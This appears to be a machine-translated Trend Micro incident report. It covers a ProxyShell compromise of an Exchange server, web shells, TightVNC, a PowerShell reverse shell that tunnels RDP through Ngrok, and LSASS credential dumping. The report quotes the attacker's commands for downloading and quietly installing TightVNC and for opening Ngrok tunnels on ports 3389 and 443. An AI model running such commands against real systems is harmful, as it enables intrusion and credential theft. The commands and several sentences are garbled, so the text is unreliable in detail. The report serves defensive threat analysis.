Trend Micro Incorporated: Discover and Defend Systems Against Attacks with Layers of Remote Control

As organizations prepare for the year ahead, now is the time to take stock of how they can strengthen their security posture and strengthen their defenses. While organizations may have the power of cutting-edge cybersecurity solutions on their side, malicious actors continue to work diligently to refine their methods and take advantage of vulnerabilities whenever they have the opportunity. A proactive mindset is therefore essential.

The team behind the Trend Micro ™ Managed XDR (MDR) solution recently resolved an issue with one of Trend Micro’s customers. It showed how a malicious actor launched a multi-level stealth attack that first exploited an endpoint vulnerability as a pathway for lateral movement. From installing a web shell in the compromised cloud server via a ProxyShell exploit, the persistent attack progressed to using legitimate remote access tools, including Remote Desktop Protocol (RDP) like last means of intrusion.

The incident also demonstrated how crucial it is for security teams to take an integrated approach to detecting, monitoring and responding to threats to quickly manage threats, especially now that the working arrangements at distance have become commonplace for businesses due to the Covid-19 pandemic.

Initial investigation

We first saw malware in an endpoint that the product quarantined. While traditional Endpoint Protection Platforms (EPP) stopped at this point, MDR took into account the context of discovery. The detection was web shell malware identified as Possible_SMWEBSHELLYXBH5A, which was found on a Microsoft Exchange server. This meant a high probability that the server was compromised by a vulnerability. In this case, the exploit most likely involved three ProxyShell vulnerabilities: CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523. This prompted the team to activate Incident Response Mode and alert the affected customer.

First layer of remote control: Web Shell

Upon closer examination, we found several suspicious web shell files, which could provide an attacker with a way to gain control of an endpoint remotely, from the server.

Figure 1. The initial event log

Progressive Root Cause Analysis (PRCA) made possible by Trend Micro Vision One ™ allowed us to trace the creation of the web shell files to a legitimate Exchange software binary, MSExchangeMailboxReplication.exe.

Figure 2. Detecting Web Shell Files

TightVNC can be used legitimately, the context of the file location being an Exchange server has raised suspicion. Our results confirmed that the malicious actor did indeed use a ProxyShell exploit.

Second layer of remote control: use of the legitimate tool TightVNC

MDR found the legitimate remote access toolTightVNCin the end point. While this application is usually not found in this context. The customer confirmed that TightVNC was not supposed to be part of the environment, so we asked the customer to uninstall it.

The subsequent monitoring and use of PRCA allowed us to trace the re-emergence of TightVNC as the file was reinstalled via another layer of remote control.

Third Remote Control Layer: Backdoor PowerShell Script

Figure 3. PowerShell script detection

Undeterred, the malicious actor created and executed a PowerShell script that we observed as C: WindowsSystem32AppLockerwinServicePrinter.ps1 (detected as Backdoor.PS1.REVSHELL.AB), which was a reverse shell. His performed routines included the following:

– Reinstall and run TightVNC

curl -o tight.msi

cmd / c start msiexec / i tight.msi / quiet

cd ../ ..

cd “program files”

cd serrévnc

– Downloading and running Ngrok (our report titled“Analysis of a complicated chain of attack involving Ngrok”provides an in-depth discussion)

loop[:]80 / ngrok.exe -o

“C: Windowssystem32ngrok.exe” tcp 3389

“C: Windowssystem32ngrok.exe” tcp 443

Figure 4. The detection of Ngrok

Further investigation revealed that the auth_token used by Ngrok was from the excizewn email address[@]Gmail[.]com. It was most likely a fictitious account which could be deleted if necessary.

Ngrok was used to open ports 3389 and 443 to the internet through Ngrok servers. This brought us to the fourth and final layer of remote control.

Fourth layer of remote control: RDP

Finally, the malicious actor resorted to RDP, which is a legitimate remote control tool built into Microsoft Windows. RDP provides an interface that allows end users to connect to another computer through a network connection. RDP has long been abused by malicious actors to exfiltrate data in attacks aimed at stealing information that can be sold in theunderground, allowing cybercriminals to integrate hacked systems intobot networksmake more serious forays. (Reports of incidents of RDP abuse for data theft can be foundhereandhere.)

As many organizations have adopted hybrid work models enabled by a remote work connection, the use of RDP has become more common, leading many IT teams to view RDP traffic as normal and harmless. However, this likely misconception makes RDP an attack vector for malicious actors trying to dodge detection. Unless one keeps a watchful eye on the telemetry, it is highly likely that security teams will ignore this event because it can be interpreted as an ordinary interaction between two users logged into the same system.

Trend Micro MDR telemetry includes the data collected by the solution across all layers of security including, but not limited to email, endpoint, server, cloud workload, and network. The MDR platform collects a wide variety of telemetry data from each security layer to detect unknown threats and facilitate root cause analysis.

At the final layer, the only proof that RDP was actually used was the next section of the telemetry.

Figure 5. MDR Telemetry

Note the running instance of the rdpclip process on the machine before dumping lsass.exe. RDP Clip is a legitimate Windows file that monitors and manages the clipboard shared between the local computer and the remote desktop that the user controls from another location. The goal of this endpoint was dumping credentials for the purpose of lateral movement.

Figure 6. Flushing credentials from LSASS process memory

Fortunately, we were able to provide the customer with timely alert and response from the time the initial intrusion through the cloud server was observed through to guidance during the cleanup and remediation process.

Threat Report Information and Threat Management Perspective

Incidents like this give security teams the ability to see attacks from different angles and holistically. Below we discuss the key pieces of information that organizations can consider when taking a proactive approach to cybersecurity to ensure maximum protection of their systems.

On web shell detection and response

MDR discovered a number of Possible_Webshell detections. The names of the files detected were random and were placed in the directory where server scripts are typically located in Internet Information Services (IIS) instances. (Created by Microsoft, IIS is extensible web server software used with the Windows NT family.) This immediately made it interesting because, first, it didn’t look like a test, and second, the many files detected with names random could mean that an attacker was attempting to place a number of web shells on the server. We later noticed web shell activity indicating that the malicious actor successfully installed at least one web shell that they were able to access.

On TightVNC and Ngrok

TightVNC and Ngrok are two legitimate apps which have been abused by malicious actors for nefarious purposes. Relying solely on EPP detection can hamper a security team’s ability to perceive the presence of such misused tools as red flags for serious attacks. MDR automatically collects and correlates data across multiple security layers, dramatically improving the speed of threat detection, investigation and response. In this case, MDR’s integrated approach provided the context that helped security analysts correlate the chain of events for accurate threat assessment and adequate response.

From the attacker’s point of view, the vulnerable outward facing server allowed him access to the environment. To consolidate their position and achieve their goal, they used TightVNC and Ngrok as a way to remotely control endpoints. By this point, they had the shell infested web server, a normal remote tool (which the EPP wouldn’t be able to detect), and a tunneling application (which the EPP wouldn’t be able to detect either). able to detect).


There are many lessons that organizations can learn from this incident. One is that organizations cannot rely solely on EPP to thwart persistent threats because it is unable to provide the holistic view needed for early detection, investigation and response. As we have seen, the series of attacks in this case used stealthy means to break into the system, including seemingly harmless tools through multiple layers of security. The complexity of the attacks made it even more difficult for the security team and threat researchers to analyze the chain of events and arrive at a clear contextual understanding of the threat scenario at hand.

Another key element, which has become more relevant now that the pandemic has pushed companies to adopt remote working configurations, is that even the most benign tools, such as RDP, can be a threat vector, as actors malicious people always try to outsmart the good ones. guys through creative tips.

An adequate response, and not just time, is essential to contain the impact and minimize the scope and severity of an attack.

Trend Micro Vision One ™ with Managed XDR

Trend Micro Vision OneMTwith managed XDRis a purpose-built platform that goes beyond traditional XDR solutions. Data collected and analyzed in silos impairs visibility because serious threats can escape detection. Vision One enables security teams to see more, respond faster, and improve security by providing a clear contextual view of threats across more threat vectors. It allows security teams and threat analysts to connect more points in a holistic view, simplifying the steps to get an attack-centric view of an entire chain of events, so organizations can take action from them. ‘one place. For more information, read thePresentation of the Vision One solution.

Comments are closed.